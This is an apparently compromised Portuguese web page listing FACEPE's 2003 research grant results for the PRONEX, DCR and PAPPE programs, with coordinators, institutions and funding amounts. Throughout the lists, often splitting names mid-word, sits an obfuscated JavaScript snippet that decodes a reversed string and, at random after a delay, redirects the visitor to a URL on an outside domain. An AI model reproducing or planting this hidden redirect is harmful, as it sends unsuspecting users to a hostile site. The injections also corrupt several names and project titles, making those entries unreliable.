CURSO DE EXTENSÃO EM CARACTERIZAÇÃO E FABRICAÇÃO DE PRE-MOLDADOS DE GESSO
RECIFE/PE

INDÚSTRIA
PÓLO GESSEIRO
VÂNIA SOARES DE CARVALHO
CEFET – RECIFE
TECNOLOGIA GPS COMO SUPORTE PARASISTEMAS DXE INFORMAÇÕES GEOGRÁFICAS – SIG
RECIFE/PE
INFORMÁTICA
INFORMÁTICA APLICADA À EDUCAÇÃO PROFIOSSIONAL E GESTÃO TECNOLÓGICA
 

andidaturas a Membros da Câmara de DCT&I da FACEPE

Membros da Câmara de Desenvolvimento Científico, Tecnológico e Inovação

Edital 04/2003 – As inscrições aconteceram no período de 02/06 a 02/07 de 2003, as c$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andidaturas foram homologadas pelo Conselho Superior da Fundação em 09/09 de 2003.

05/2003 – Programa de Apoio a Núcleos de Excelência (PRONEX)

Resultado do Edital PRONEX – Nº 05/2003 de 24/09/2003

 

O Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) aprovou integralmente a proposição resultante do julgamento efetivado pelo Comitê Local de Pernambuco, composto, inclusive, com os representantes indicados pelo CNPq.

Dessa forma, a Facepe já está autorizada a contratar os projetos aprovados nos termos sugeridos e constantes da relação das propostas abaixo. Em breve, a Fundação convocará os pesquisadores contemplados para que assinem o Termo de Outorga.

O Pronex receberá um investimento de R$2.311.967,40, metade deste valor será de recursos do Tesouro do Estado e a outra metade, do Governo Federal. Desse total, R$ 500 mil já foram liberados pelo CNPq e encontram-se à disposição da Facepe para serem aplicados nas propostas contempladas.

O Pronex é fruto de um convênio entre a Facepe e o Ministério da Ciência e Tecnologia. Confira, a seguir, o nome dos projetos selecionados.
PROPOSTAS APROVADAS PELA COMISSÃO DE COORDENAÇÃO DO PRONEX E PRESIDÊNCIA DO CNPq(POR ORDEM ALFABÉTICA)
N.
COORDENADOR INSTITUIÇÃO PROJETO PROJETO
1.
Cid Bartolomeu de Araújo
UFPE / UFRPE
Materiais Nanoestruturados para Aplicações em Dispositivos Fotônicos
R$ 250.000,00
2.
Francisco George Brady Moreira

UFPE / UFRPE
Materiais Magnéticos Nanoestruturados
R$ 250.000,00
3.
Frederico Guilherme Coutinho Abath

CPqAM / UPE / UFRJ
Clonagem de Genes que Codificam Antígenos de Leishmania (V) braziliensis Reconhecidos por Pacientes com Leishmaniose Tegumentar Americana e Análise Imunológica, Vis$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando o Desenvolvimento de Abordagens Diagnósticas e Imunoprofilática
R$ 249.746,50
4.
José Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Thomé Jucá
UFPE / PUC-RIO / CEFET-CE / UFC
Avaliação do Potencial Energético do Biogás Proveniente de Aterros de Resíduos Sólidos
R$ 249.643,00
5.
Luana Cass$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andra Breitenbach Barroso Coelho
UFPE / UPE
Desenvolvimento de Teste Diagnóstico Diferencial Específico para Caracterização do Perfil Glicoprotéico de Pacientes Portadores de Esquistossomose Mansônico
R$ 249.100,00
6.
Marcelo dos Santos Guerra Filho
UFPE / UFPB / EMBRAPA
Mapeamento Físico e Localização de Genes de Resistência e Poliembrionia em Cromossomos de Citrus
R$ 189.865,05
7.
Maurício Domingues Coutinho Filho
UFPE / Universo
Modelagem de Processos e Fenômenos Físicos em Materiais
R$ 250.000,00
8.
Roberto Quental Coutinho
UFPE / POLI-UPE / Ministério das Cidades / CONDEPE / FIDEM / Prefeitura do Recife / Prefeitura de Camaragibe / ADEMI-PE
Núcleo de Engenharia Geotécnica e Tecnologias Ambientais Aplicadas a Encostas Urbanas
R$ 250.000,00
9.
Sonia Maria Barreto Pereira
UFRPE / UFPE / USP
Biodiversidade e Diversidade Genética de Algas Marinhas de Pernambuco
R$ 182.470,00
10.
Suely Lins Galdino
UFPE / UNICAP
Síntese, Atividade Farmacológica e Modelagem Molecular de Tiazolidinadionas Bifuncionais C$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andidatas a Fármacos Antidiabéticos e Anti-Hipertensivos
R$ 191.142,85
TOTAL
 

R$2.311.967,40

 

07/2003 – Programa de Desenvolvimento Científico e Regional – DCR

Resultado do Edital DCR – Nº 07/2003 de 25/09/2003

Depois do processo de seleção, a Facepe acaba de divulgar a relação das propostas selecionadas para concorrer às 30 bolsas do Edital do Programa de Desenvolvimento Científico Regional (DCR), fruto de um convênio com o Ministério da Ciência e Tecnologia. Uma Comissão Especial de Assessoramento foi implantada e executou todo o trabalho de avaliação das 55 propostas encaminhadas.

O processo foi dividido em duas fases. Na primeira, as análises foram realizadas conforme a área de conhecimento das propostas. Na seqüência, os membros da Comissão se concentraram na priorização das propostas recomendadas, ger$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando o resultado abaixo relacionado. Em seguida, a Direção da Facepe homologou a decisão da Comissão Especial de Assessoramento.

Próximos passos – As propostas selecionadas foram encaminhadas para o Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) para decisão da presidência do CNPq quanto à homologação das propostas. Em breve, a Facepe enviará uma comunicação a todos os pesquisadores contemplados neste Edital.

Confira abaixo a relação das 30 propostas selecionadas no Edital MCT/CNPq/CT-INFRA/FACEPE Nº 007/2003:

PROGRAMA DE DESENVOLVIMENTO CIENTÍFICO REGIONAL
COORDENADOR
INSTITUIÇÃO ÁREA PROJETO
Adja Ferreira de Andrade
UFPE
Informática
Tecnologias de Informação e Colaboração Aplicadas a Educação a Distância
Adriana Mayumi Yano de Melo
EMBRAPA Petrolina

Fruticultura
Seleção de Fungos Micorrízicos Arbusculares para Produção de Porta-Enxertos de Videiras Cultivadas no Vale do Submédio São Francisco
Adriana Carla Cavalcante Malta Argôlo
UFPE
Biotecnologia
Ação de uma Lectina e de Extrato Hidroalcoólico de Folhas de Bauhinia mon$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andra sobre os Níveis de Glicose, Insulina e Estresse Oxidativo em Ratos Submetidos à Má-Nutrição Intra-Uterina
Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andre da Silva Rosas
UFPE
Física
Estudos em Física de Meios Granulares, Física Biológica e em Física Estatística de Sistemas Magnéticos Desordenados
Ana Elizabete de Araújo Machado
UFPE
Química
Modelagem de Novos Materiais Orgânicos com Propriedades Ópticas não Lineares
Andrelina Maria Pinheiro Santos
UFPE
Engenharia de Alimentos
Aplicação de Sensores para o Controle da Qualidade de Óleo Comestível Utiliz$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando no Processamento de Alimentos
Antonio Cabral Cavalcanti
UFRPE
Ciência do Solo
Aumento do Potencial Produtivo da Agricultura Orgânica com Aplicação de Argilas Cálcicas do Polo Gesseiro
Carlinda Maria de Freitas Azevedo
UFRPE
Matemática
Dinâmica Induzida por Figuras Simétricas Planas e Pertubações de Problemas Planares
Carlos Daniel Pérez
UFPE
Zoologia
Farmacologia, Química e Toxicologia dos Zoantídeos (Cnidaria, Anthozoa) do Litoral Pernambucano, com Potencial Aplicação Biotecnológica
Cristiane Reis Martins UFPE Engenharia Química
Desenvolvimento de Tintas Inibidoras de Corrosão a Base de Polímeros Condutores para Revestimento de Dutos
Cynthia Maria Carneiro Costa ITEP Tecnologias Ambientais
Uso de Parâmetros Microbianos no Monitoramento de Solos do Semi-Árido Contaminados por Metais Pesados
Eine Waked Ferreira Gomes UFRPE/ EMBRAPA M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andioca/ IPA Fruticultura
Seleção de Genótipos de Bananeira Tolerantes à Salinidade e Identificação de Genes de Tolerância
Gerd Bruno da Rocha UFPE Química
Desenvolvimento de Novos Métodos Químicos-Quânticos para o Estudo de Compostos Luminescentes com Íons Lantanídeos e Aplicações em Biotecnologia
Hélcio José Batista UFPE Química Fundamental
Transferência de Carga e de Energia em Materiais e em Sistemas Biológicos Contendo Íons Metálicos: Desenvolvimento e Aplicação de Novas Ferramentas Teóricas Computacionais Voltadas para a Modelagem de Nano-Dispositivos
Ivanildo Luiz de Mattos UFPE Química Fundamental
Controle de Qualidade na Indústria Sucro-Alcooleira: Desenvolvimento de Métodos Automatizados
José Marcos Francisco da Silva UFPE Farmácia
Desenvolvimento de Processos de Purificação de Substâncias Bioativas por Cristalização
José Vieira Silva UFRPE Botânica
Seleção de Genótipos de Aceroleiro e Pinheira Tolerantes ao Estresse Hídrico e Salino, Através das Respostas Morfofisiológicas e Bioquímicas
Laureen Michelle Houllou UFPE Genética
Indução de Mutação e Seleção ‘in vitro’ de Cana-de-Açúcar, Vis$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando à Obtenção de Tolerância a Seca
Leonardo Paes Rangel UPE Engenharia Mecânica
Geração Térmica de Energia em Pernambuco (GETEPE)
Luis Carlos de Sousa Menezes UFPE Informática
Definição Formal de Linguagens para Domínios Específicos
Márcia Vanusa da Silva UFRPE/IPA Agronomia
Quitinases de Lycopersicon esculentum (Mill): Identificação, Purificação, Caracterização e Atividade no Controle do Fungo Patogênico Fusarium oxysporum f. sp. Lycopersici
Marcos Antonio Ramos Pereira de Lucena UNICAP Física
Biomagnetismo e Nanomagnetismo em Associação com Polímeros Condutores Eletroativos no Desenvolvimento de Novas Tecnologias Médicas
Maria Bernadete Costa e Silva IPA Botânica
Diversidade e Distribuição das Gramineae (Poaceae) Forrageiras em Pernambuco
Maurício Alves da Motta Sobrinho UFPE Engenharia Química
Estudo dos Processos de Tratamento de Efluentes por Análise de Imagem
Noemia Pereira dos Santos UFPE Farmácia
Avaliação das Propriedades Toxicológicas e Farmacocinética de Ssitemas Coloidais contendo Ácido Úsnico e Desenvolvimento da Técnica de Microdiálise para Determinação in situ da Penetração Tecidual da Anticancerígenos em Tumores
Regina Ceres Torres da Rosa IPA Agrárias
Potencial de Indutores de Resistência Bióticos e Abióticos no Controle de Plasmopara viticola, Botryodiplodia theobromae e Elsinoe ampelina em Vitis vinifera
Renata Maria Cardoso Rodrigues de Souza UFPE Informática
Métodos de Cluster para Dados Simbólicos
Sônia Formiga de Albuquerque IPA Biologia do Solo e Botânica
Sustentabilidade de Sistema Agrosilvipastoril na Região Semi-Árida do Estado de Pernambuco
Suzana Pereira Vila Nova UFPE Química
Síntese de Novos Marcadores Supramoleculares Coordenados a Íons Lantanídeos
Vera Lúcia Marques de Sena UFPE Química Orgânica
Ambiente-Amigável Síntese de Compostos Orgânicos Mediados por Microondas nas Condições
COMISSÃO AVALIADORA DAS PROPOSTAS


NOME
INSTITUIÇÃO
1. Ana Carolina Br$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andão Salgado
UFPE – Informática
2. César Augusto Moraes de Abreu
UFPE – Engenharia Química
3. Helio Almeida Burity
IPA – Agronomia
4. Joaquim Evêncio Neto
UFRPE – Morfologia e Fisiologia Animal
5. Marcos Antônio de Morais Junior
UFPE – Genética
6. Valderez Pinto Ferreira
UFPE – Geologia
 

11/2003 – PAPPE – Propostas aprovadas

Relação das propostas aprovadas para o PAPPE – FACEPE/FINEP
FUNDO SETORIAL NOME DO PROPONENTE TÍTULO DO PROJETO
AGRONEGÓCIOS ANTONIO CABRAL CAVALCANTI DESENVOLVIMENTO DE CONDICIONADOR DE SOLO NATURAL ARGILO-MINERAL DERIVADO DO POLO GESSEIRO (IND. GESSO ESPECIAIS)
AGRONEGÓCIOS ROBERTO SOARES DE CASTRO DESENVOLVIMENTO DE UM TESTE DE AGLUTINAÇÃO EM LÁTEX (CAEV) – BIOVETEC
SAÚDE ANTONIO CARLOS BEZERRA RODRIGUES MONITORAMENTO E CÁLCULO DO BALANÇO HÍDRICO (TMED)
SAÚDE P/ 2ª FASE DAVI PEREIRA DE SANTANA DESENVOLVIMENTO FARMACOTÉCNICO E AVALIAÇÃO CLÍNICA DO LAPACHOL COMO ANTIFLAMATÓRIO TÓPICO NA FORMA EMUGEL (VIDFARMA)
SAÚDE LUIZ ANTONIO PORTELA GUERRA MONITORIZAÇÃO DO BLOQUEIO NEURO-MUSCULAR (TMED)
SAÚDE PEDRO JOSÉ ROLIM NETO DESENVOLVIMENTO DE UM NOVO PRODUTO EM DIFERENTES FORMAS FARMACÊUTICAS À BASE DE B-LAPACHONA PARA UTILIZAÇÃO EM TERAPIAS ANTINEOPLÁSICAS(LAFEPE)
ENERGIA EDUARDO SATO EQUIPAMENTO PARA REDUÇÃO DE CONSUMO DE ENERGIA EM SISTEMAS DE CONDICIONADORES DE AR (TRON)
ENERGIA GERMANO CRISPIM VASCONCELOS FAULTPREDICTOR – SISTEMA DE MONITORAMENTO E CONSULTAS PARA ANTECIPAÇÃO DE FALHAS EM SISTEMAS ELÉTRICOS E DE TELECOMUNICAÇÕES (NEUROTECH)
ENERGIA P/ 2ª FASE LUCIANO HENRIQUE A PERDIGÃO DESENVOLVIMENTO E OTIMIZAÇÃO DE PROCESSOS DE COMBUSTÃO DE SÓLIDOS EM LEITO FLUIDIZADO COM ALIMENTAÇÃO MECANIZADA PARA GERAÇÃO ENERGÉTICA EM FORNOS PARA PRODUÇÃO DE GESSO(INGESEL)
VERDE/AMARELO ALBERTO FÁVIO SAMICO V. DRUNNEN DESENVOLVIMENTO DE ALGORÍTMO E SOFTWARE PARA OTIMIZAÇÃO EM TEMPO REAL DE PLANOS DE TRÁFEGO DE REDES SEMAFÓRICAS (SERTTEL LTDA)
VERDE/AMARELO ANA CAROLINA NUNES INOJOSA DE OLIVEIRA DESENVOLVIMENTO DE JOINT COMPOUND NACIONAL – JUNTA DE GESSO PARA CHAPA DE GESSO ACARTONADA (DRYWALL)(IND.GESSO ESPEC.)
VERDE/AMARELO ANTONIO SERGIO DE OLIVEIRA CARVALHO MASSA ECOLOGICAMENTE CORRETA PARA A PRODUÇÃO DE LOUÇA SANITÁRIA COM ALTA ESTABILIDADE DIMENSIONAL(CAULIM)
VERDE/AMARELO DANIELLE ROUSY DIAS DA SILVA PLATAFORMA PARA JOGOS INTENSAMENTE MULTIUSUÁRIOS MÓVEIS COM SERVIÇOS BASEADOS EM LOCALIZAÇÃO(UNW DESENVOLVIMENTO E EXPORT. DE SOFTWARE)
VERDE/AMARELO EDUARDO AZEVEDO RODRIGUES CUBE-IT – PLATAFORMA INTEGRADA DE SOLUÇÕES DE INTELIGÊNCIA EMPRESARIAL(PROGRAPH)
VERDE/AMARELO EDUARDO OSÓRIO DE CERQUEIRA CARACTERIZAÇÃO DE ARGILAS PERNAMBUCANAS PARA OTIMIZAR SEU USO INDUSTRIAL (CAULIM)
VERDE/AMARELO GIBEON SOARES DE AQUINO JR. QUALITI CODER – DESENVOLVENDO COM PRODUTIVIDADE E QUALIDADE(QUALITI)
VERDE/AMARELO JULIANA SILVA DA CUNHA DESENVOLVIMENTO DE UMA PLATAFORMA DE TRANSAÇÕES ELETRÔNICAS UTILIZANDO TECNOLOGIA MÓVEL (E-CAPTURE)
VERDE/AMARELO JOÃO TEOTÔNIO MANZI MONTEIRO DE ARAÚJO CONTROLE DO PROCESSO DE CLARIFICAÇÃO (USINA CUCAÚ)
VERDE/AMARELO MA. VERÔNICA O PAIXÃO DESENVOLVIMENTO DE PLACAS CERÂMICAS COM GRANDES DIMENSÕES E ALTA PERFORMANCE. (CAULIM)
VERDE/AMARELO PAULO CARNEIRO DA CUNHA FILHO AMBIENTE INTEGRADO DE AVALIAÇÃO COM APLICAÇÃO AO ENSINO À DISTÂNCIA (MATSUSHIMA)
VERDE/AMARELO RAUL OSCAR SANT´ANNA FERREIRA SISTEMA DE FISCALIZAÇÃO DE VIAGENS DE ÔNIBUS FISCAL ELETRÔNICO (FRT TECNOLOGIA)
VERDE/AMARELO RENATO EVANGELISTA DE ARAÚJO ESPECTROSCOPIA ÓPTICA E TÉCNICAS DE OPTOELETRÔNICAS NA ANÁLISE E CONTROLE DE PRODUTOS QUÍMICOS (CLARO TECNOLOGIA)
VALOR TOTAL APROVADO = R$ 3.500.000,00

11/2003 – PAPPE – Propostas classificadas para 1ª fase

Relação das propostas classificadas para concorrerem à 1ª fase do PAPPE

Para facilitar o acesso a informações sobre legislação, a FACEPE está disponibiliz$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando um link direto. Clique aqui.

A Facepe informa que quaisquer dúvidas poderão ser esclarecidas através dos e-mails fcabral@facepe.br e angela@facepe.br. É imprescindível verificar a documentação necessária para participar da FASE I.


Proponente Empresa
Adriana Cruz de Góis AMBS – Tecnologia, Ind. E Comércio Ltda
Alberto Flávio Samico Van Drunnen Serttel Ltda
Alex S$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro Gomes Casullo Comunicação e Design
Amaro Monteiro Barbosa Sobrinho AMBS – Tecnologia, Ind. E Comércio Ltda
Ana Carolina Nunes Inojosa de Oliveira Indústria de Gessos Especiais Ltda
Antonio Cabral Cavalcanti Indústria de Gessos Especiais Ltda
Antonio Carlos Bezerra Rodrigues TMED – Tecnologia Médica Ltda
Antonio Carlos Duarte Coelho Ainda não constituída
Antonio Henrique Rocha de Carvalho FITec – Fundação para Inovações Tecnológicas
Antonio Sergio de Oliveira Carvalho Caulim do Nordeste S/A
Antonio Vaz de A. Cavalcanti Optanica – Optoeletronica Organica
Bertr$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Seyller Domminus Software
Boris Botler Endoview do Brasil Ltda
Carlos Augusto Oliveira Rocha ALMEC – Iluminação Ltda
Carlos Ferraz C.E.S.A.R – Centro de Estudos e Sistemas Avançados do Recife
Carlos Henrique Rodrigues Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andria Fabrik Tecnologia da Informação Ltda
Cinthia Rodrigues de Vasconcelos Câmara Centro de Reabilitação Reabilitar Ltda
Daniele Mattos Franklin Vanguard Comercial Serv. Importação e Exportação Ltda
Danielle Rousy Dias da Silva UNW Desenvolvimento e Exportação de Software Ltda
Davi Pereira de Santana VIDFMARMA Indústria de Medicamentos Ltda
Décio Fonseca Facilit Tecnologia
Eduardo Azevedo Rodrigues Prograph – Inf. Consultoria e Sistemas Ltda
Eduardo Boudoux Jatobá ALMEC – Iluminação Ltda
Eduardo Freitas Midiavox Ltda
Eduardo Osório de Cerqueira Caulim do Nordeste S/A
Eduardo Sato Tron – Controles Elétricos Ltda
Eliane Cardoso de Vasconcelos Indústria de Gessos Especiais Ltda
Eloi José Soares Passos de Cerqueira Vinícola do Vale do São Francisco S/A
Emanoel Sérvio Coqueiro dos Santos Biogene Indústria e Comércio Ltda ME
Eugênia Maria Mariz Maranhão Rios Bioticom – Biotecnológica, indústria e Comércio Ltda
Filipe Aguiar de Souza Lacerda HABILIS Tecnologia de Resultados Ltda
Flávio Fontes Caltech
Garibaldi Galvão Rocha Midiavox Ltda
Germano Crispim Vasconcelos NeuroTech
Gibeon Soares de Aquino Jr. Qualiti Software Processes
Hermano Perrelli de Moura Qualiti Software Processes S/A
Ismar Neumann Kaufman In Forma Software Ltda
Isnaldo José de Souza Coelho Optanica – Optoeletronica Organica
Jacques Robin C.E.S.A.R – Centro de Estudos e Sistemas Avançados do Recife
Jeferson Valadares Jynx Playware Ltda
João Teotônio Manzi Monteiro de araújo Usina Cucaú
José Barbosa Cabral Biolab Tecnologia Vegetal Ltda
José Júlio Vilar Rodrigues Biolab Tecnologia Vegetal Ltda
José Lamartine de Andrade Aguiar Somerville Ltda
Juliana Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andes de Lima Fabrik Tecnologia da Informação Ltda
Juliana Silva da Cunha e-Capture – Unidade de Negócios Incubada no C.E.S.A.R.
Lauro Sigaud Ferreira FITec – Fundação para Inovações Tecnológicas
Leonardo Marques de ª Cavalcanti Jr. Caulim do Nordeste S/A
Leonor da Costa Maia Biolab Tecnologia Vegetal Ltda
Luciano Henrique Alves Perdigão Ingesel – Mineração, calcinação e premoldados Ltda
Luiz Antonio Portela Guerra TMED – Tecnologia Médica Ltda
Manfred Oswald Schwartz Indústria de Gessos Especiais Ltda
Marcos Aulete Ribeiro Lyra ProDelphus Ltda – ME
Maria de Fátima Gonçalves de Oliveira Green World Tecnologia Ambiental Ltda
Maria Verônica Oliveira da Paixão Caulim do Nordeste S/A
Merval de Almeida Jurema Filho ADVANCE – Sociedade para Educação em Tecnologia da Informação S/C
Nélia da Silva Lima Bunge Alimentos S/A
Patricia Almeida Carlos Diniz Progesso (em fase de constituição)
Paulo Carneiro da Cunha Filho Matsushima Microssistemas do Brasil Ltda
Pedro José Rolim Neto LAFEPE
Raimundo Jorge Teles de Araújo Pereira Embriocom S/A
Raul Oscar Sant´Anna Ferreira FRT Tecnologia Eletrônica Ltda
Reginaldo Guimarães Valadares Jynx Playware Ltda
Renata Dourado Pinho Indústria de Gessos Especiais Ltda
Renato Evangelista de Araújo Claro Tecnologia Ltda
Ricardo Perez de Almeida Vinícola do Vale do São Francisco S/A
Roberto Soares de Castro Biovetech – Biotecnologia para Saúde Animal
